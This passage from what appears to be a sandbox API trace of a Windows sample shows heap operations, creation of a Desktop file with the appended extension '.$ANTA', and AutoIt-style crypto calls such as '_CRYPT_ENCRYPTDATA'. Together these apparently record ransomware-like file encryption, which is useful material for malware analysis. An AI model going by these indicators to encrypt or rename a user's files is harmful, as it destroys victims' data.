lpMsg=0x144f084) returned 0 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d9b0 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d9b0 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0132.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0132.681] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.682] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\lb o7wz9.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0132.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0132.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.683] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0132.683] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0132.683] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0132.683] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b8a020 [0132.686] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0132.686] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x6a36, lpOverlapped=0x0) returned 1 [0132.688] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0132.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0132.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0132.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49aa010 [0132.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b8a020 | out: hHeap=0x1780000) returned 1 [0132.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0132.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0132.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49b0a50 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49aa010 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0132.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0132.691] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2920 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49aa010 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6a36) returned 0x49b7490 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0132.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.693] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0132.693] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0132.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0132.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0132.694] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0132.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0132.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0132.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0132.694] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.695] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.695] 